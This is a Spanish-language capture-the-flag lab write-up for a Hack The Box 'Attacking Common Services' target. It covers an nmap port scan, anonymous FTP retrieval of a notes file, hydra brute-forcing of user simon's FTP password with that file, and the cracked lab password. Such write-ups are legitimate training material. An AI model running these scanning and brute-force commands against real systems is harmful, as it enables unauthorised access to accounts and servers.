Inlanefreight - Attacking Common Services (Medium)

Objetivo: Revisar la seguridad del servidor y obtener el contenido de flag.txt.
Target: 10.129.203.7 (Inlanefreight.htb)
Flag format: HTB{...}


🔎 Escaneo inicial de puertos

sudo nmap -p- --min-rate 5000 --open -sS -n -sVC 10.129.121.116

{43ACE8CD-AC00-4565-A863-A8FA87B079F0}.png
Puertos abiertos detectados:

Puerto Servicio Info relevante
22 SSH 🔑 OpenSSH 8.2p1 Ubuntu, soporte para autenticación por contraseña y/o llave
53 DNS 🌐 ISC BIND 9.16.1, permite enumeración de registros
110 POP3 ✉️ Dovecot pop3d, soporta USER, TOP, SASL(PLAIN)
995 POP3S 🔒 Dovecot pop3d, POP3 sobre SSL/TLS
2121 FTP 💾 ProFTPD (InlaneFTP) — puerto alternativo, comandos limitados
30021 FTP 💾 ProFTPD adicional, servicio no reconocido completamente

📌 Observaciones rápidas:

FTP 💾🎒

ftp 10.129.167.40 30021
anonymous
get mynotes.txt

{E891D03B-4D2E-4236-BF32-72802E95F358}.png

hydra -l simon -P mynotes.txt ftp://10.129.167.40:2121 
hydra -l simon -P mynotes.txt ftp://10.129.167.40:30021

Resultado: contraseña válida para simon encontrada ✅
Ns8j1b!23hs4921smHzwn 🔐
{C860EEDC-75B7-4EC9-96E5-58ACA09D2590}.png